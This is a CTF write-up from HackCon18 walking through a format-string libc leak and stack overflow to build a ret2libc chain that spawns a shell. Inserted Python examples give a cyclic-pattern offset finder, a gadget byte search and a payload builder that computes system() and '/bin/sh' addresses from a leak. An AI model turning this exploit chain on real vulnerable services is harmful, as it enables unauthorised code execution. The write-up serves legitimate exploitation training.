Simple yet elegant pwn

Hey guys, the HackCon18 CTF has just finished, so let's go through the writeup of the "Simple Yet Elegant pwn" challenge. This pwn is based on a format string vulnerability combined with a stack buffer overflow. The plan is to leak a libc address with the format string (we assume ASLR is enabled on the remote box), compute the remote address of system() from it, and spawn a shell.

The first step is to check which protections are enabled on the binary.


As we can see, everything is disabled except NX. Now let's try executing the binary.


OK, the process just echoes our input back. Now try with a format string.


As we can see, the output contains addresses from the process's stack. Next, try a large input instead.


There is a segmentation fault. Let's jump into radare2 to look at the assembly of this binary.


The main function reads the input with scanf, and this is where the overflow happens. Now examine the core dump left by the crash with gdb.


This is how we calculate the size of the buffer. Next we examine the stack for a libc address to leak with the format string. For this we run the program in gdb and break on printf, because the format string shows us the stack exactly as printf sees it.
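The write-up derives the buffer size from the core dump. As an added example (not part of the original write-up), here is the cyclic-pattern approach that tools like pwntools automate: feed a De Bruijn pattern to the vulnerable scanf, read the bytes that landed in the saved return address from the core dump, and look up their offset in the pattern. Nothing below comes from the challenge binary; the pattern length and the offsets used in the usage section are constructed.

```python
# Added example, not from the original write-up: a cyclic (De Bruijn) pattern
# makes the "how big is the buffer?" step exact. Feed cyclic(N) to the
# vulnerable scanf, then look up the bytes that ended up in the saved return
# address. On x86-64 the faulting `ret` leaves them at [rsp] in the core dump
# (the value is non-canonical, so rip never changes); on 32-bit they are EIP.
from itertools import islice

ALPHABET = "abcdefghijklmnopqrstuvwxyz"   # no whitespace: scanf("%s") reads it whole


def _de_bruijn(alphabet, n):
    """Yield the De Bruijn sequence B(k, n): every n-char window occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4, alphabet=ALPHABET):
    """First `length` bytes of the pattern, ready to be sent to the program."""
    return "".join(islice(_de_bruijn(alphabet, n), length)).encode()


def cyclic_find(value, n=4, alphabet=ALPHABET):
    """Offset of the n-byte chunk `value` inside the pattern, or -1.

    `value` may be bytes or an int read from a register / the stack in gdb;
    an int is taken little-endian and only its low n bytes are used, which is
    what you want for the 8-byte value at [rsp] after a 64-bit overflow.
    """
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    needle = value[:n].decode()
    window = ""
    for pos, ch in enumerate(_de_bruijn(alphabet, n)):
        window = (window + ch)[-n:]
        if window == needle:
            return pos - (n - 1)   # index of the window's first char
    return -1


if __name__ == "__main__":
    pat = cyclic(200)             # constructed: send this instead of "AAAA..."
    print(pat[:32])
    # Pretend gdb showed this 8-byte value at [rsp] in the core dump:
    crash_value = int.from_bytes(pat[72:80], "little")
    print(cyclic_find(crash_value))   # 72 = bytes from buffer start to saved rip
```

The offset reported is the distance from the start of the buffer to the saved return address, which is the padding length for the ROP stage later on.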


Good, there is an address inside __libc_start_main (the return address of main). But there is a problem: if we insert a large input to overwrite the return address, our input overwrites this value too! So we look for another libc address to use instead. In particular there is 0x00007ffff7a6287d at the very start of what our format string sees, but only on the remote server! (For the moment I do not know why; maybe it is due to the different libc version.) This address may be inside the fflush function, but I'm not sure, so we compute the difference between this value and the __libc_start_main address to recover the latter.

Run the remote process to obtain these two values.


Here %1$p is the format-string position that returns our mysterious address and %17$p the one that returns the __libc_start_main address. (On x86-64, positions 1 to 5 are the register arguments rsi, rdx, rcx, r8 and r9 rather than stack slots, which is why the value behind %1$p survives the overflow while the return address behind %17$p does not.) Subtracting one from the other gives the constant difference that we use from now on.


OK, now we have a valid libc address! Next we need the start of __libc_start_main, and then the offsets of system and the "/bin/sh" string. For this we examine the libc that was given to us.


Here 0x21f45 is the leaked __libc_start_main address expressed as an offset into libc: it lies 245 bytes (0xf5) after the start of __libc_start_main, which is therefore at offset 0x21e50. Now we can calculate the libc base, and from it system and "/bin/sh". Run the libc database to get the offsets of system and "/bin/sh".


Now search for a gadget that puts the "/bin/sh" address into rdi, the first argument register for system(); typically a pop rdi; ret.

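The gadget-search output that belonged here is not on the page. As an added example, not from the write-up, this is the byte search that tools like ROPgadget and ropper perform for `pop rdi; ret` (5f c3) and similar gadgets, run over a constructed blob of typical non-PIE epilogue bytes. TEXT and TEXT_VA are assumed for the illustration and are not taken from the challenge binary; with a real target you would read the .text bytes and their address from readelf or pyelftools.

```python
# Added example, not from the original write-up: the byte-level gadget search
# behind ROPgadget/ropper. Overlapping matches are kept on purpose: `41 5f c3`
# is `pop r15; ret`, but jumping in one byte later gives `5f c3` =
# `pop rdi; ret`, which is where the gadget usually comes from in the
# __libc_csu_init of a non-PIE binary.
GADGETS = {
    "pop rdi; ret": b"\x5f\xc3",
    "pop rsi; ret": b"\x5e\xc3",
    "pop rbp; ret": b"\x5d\xc3",
    "ret":          b"\xc3",
}


def find_gadgets(text, text_va, gadgets=GADGETS):
    """Map gadget name -> sorted virtual addresses where its bytes occur.

    `text` is the raw bytes of an executable section and `text_va` the
    virtual address of its first byte.
    """
    found = {}
    for name, pattern in gadgets.items():
        addrs = []
        start = 0
        while (i := text.find(pattern, start)) != -1:
            addrs.append(text_va + i)
            start = i + 1            # keep scanning for overlapping hits
        found[name] = addrs
    return found


# Constructed bytes (assumed, not from the challenge): a function epilogue
# followed by the tail of a typical __libc_csu_init.
TEXT = bytes.fromhex(
    "554889e5"            # push rbp; mov rbp, rsp
    "c9c3"                # leave; ret
    "415c415d415e415fc3"  # pop r12; pop r13; pop r14; pop r15; ret
    "5dc3"                # pop rbp; ret
)
TEXT_VA = 0x400600        # assumed load address of these bytes

if __name__ == "__main__":
    for name, addrs in find_gadgets(TEXT, TEXT_VA).items():
        print(f"{name:14s} " + ", ".join(f"{a:#x}" for a in addrs))
```

Note that `pop rsi; ret` is not found even though a 5e byte is present: it is followed by 41, not c3, so the search only reports byte sequences that really end in a ret.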

OK, now we have all the ingredients for our script.

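The following puts the address arithmetic from the previous steps (leak, libc base, system and "/bin/sh") and the payload layout into code. It is an added example, not the author's script: it uses the write-up's two libc constants (0x21f45 and the 245-byte distance to the start of __libc_start_main), while SYSTEM_OFF, BINSH_OFF, the gadget addresses, PAD and the leak line are assumed placeholders to be replaced with the values from the libc database, ROPgadget and the core dump. It also assumes the leak (%17$p) and the overflow are sent as two separate inputs, since under ASLR the addresses in the chain can only be computed after the leak; with a single input you would leak through %1$p as the write-up does and apply the measured difference. Two checks are included that the write-up does not mention: the recovered base must be page-aligned, and the payload must contain no whitespace, because scanf("%s") stops at the first one.

```python
# Added example, not the author's exploit: address arithmetic and payload
# construction for the challenge, checkable offline. Values marked ASSUMED
# are placeholders for this illustration.
import struct

LSM_RET_OFF = 0x21f45         # write-up: libc offset of the address leaked via %17$p
LSM_OFF = LSM_RET_OFF - 245   # write-up: __libc_start_main starts 245 bytes earlier
SYSTEM_OFF = 0x45390          # ASSUMED: offset of system() in the given libc
BINSH_OFF = 0x18cd57          # ASSUMED: offset of the "/bin/sh" string in the given libc
POP_RDI_RET = 0x400763        # ASSUMED: `pop rdi; ret` gadget in the (non-PIE) binary
RET = 0x400764                # ASSUMED: a plain `ret`, used to realign the stack
PAD = 72                      # ASSUMED: bytes from buffer start to the saved return address
LEAK_FMT = b"%17$p"           # write-up: prints the __libc_start_main return address

WHITESPACE = b" \t\n\v\f\r"   # scanf("%s") stops at any of these bytes


def p64(value):
    return struct.pack("<Q", value)


def parse_leak(line):
    """Turn the `0x7f...` token that printf echoes for %17$p into an int."""
    return int(line.split()[0], 16)


def libc_base(leak):
    """Leak minus its known offset. libc is mmapped page-aligned, so a
    non-zero low 12 bits means the offset (or the libc build) is wrong."""
    base = leak - LSM_RET_OFF
    if base & 0xfff:
        raise ValueError(f"leak {leak:#x} gives unaligned base {base:#x}: "
                         "wrong offset or wrong libc")
    return base


def resolve(base):
    """Absolute addresses of the symbols the chain needs."""
    return {
        "__libc_start_main": base + LSM_OFF,
        "system": base + SYSTEM_OFF,
        "/bin/sh": base + BINSH_OFF,
    }


def rop_stage(base, align=True):
    """PAD bytes of filler, then a chain that runs system("/bin/sh") on `ret`.

    align=True inserts an extra `ret` so rsp is 16-byte aligned when system()
    starts; glibc's system() executes movaps on the stack and crashes
    otherwise on some builds.
    """
    syms = resolve(base)
    chain = b"A" * PAD
    chain += p64(POP_RDI_RET) + p64(syms["/bin/sh"])   # rdi = "/bin/sh"
    if align:
        chain += p64(RET)
    chain += p64(syms["system"])                        # return into system()
    return chain


def scanf_safe(payload):
    """True if scanf("%s") would read every byte (no whitespace inside)."""
    return not any(b in WHITESPACE for b in payload)


if __name__ == "__main__":
    # Constructed leak line, as the remote printf would echo it for LEAK_FMT.
    leak = parse_leak(b"0x7f3a1c021f45\n")
    base = libc_base(leak)
    print(f"libc base          {base:#x}")
    for name, addr in resolve(base).items():
        print(f"{name:18s} {addr:#x}")
    stage2 = rop_stage(base)
    print(f"stage 2: {len(stage2)} bytes, scanf-safe: {scanf_safe(stage2)}")
```

If scanf_safe() returns False for a given base, one of the addresses contains a whitespace byte and the payload will be truncated; in that case reconnect and try again with a different ASLR base, or pick a different gadget or "/bin/sh" string.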

Now run it.


 

2018-08-17T21:49:18+00:00
